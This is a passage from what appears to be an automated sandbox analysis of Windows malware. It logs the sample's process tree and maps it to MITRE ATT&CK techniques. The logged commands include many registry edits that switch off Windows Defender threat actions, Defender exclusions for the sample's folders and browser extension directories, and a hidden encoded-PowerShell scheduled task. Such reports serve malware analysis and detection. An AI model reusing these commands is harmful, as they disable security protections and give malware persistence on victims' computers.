\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:392

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:1188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:3240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:4320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:3976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:3264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4668

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
PID:2668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1428

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:3272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3500

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
3⤵
PID:2884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
3⤵
PID:4076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
3⤵
PID:5044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
3⤵
PID:2120

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXmHKsugs" /SC once /ST 01:38:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1568

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXmHKsugs"
2⤵
PID:3496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3592

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:792

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1172

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery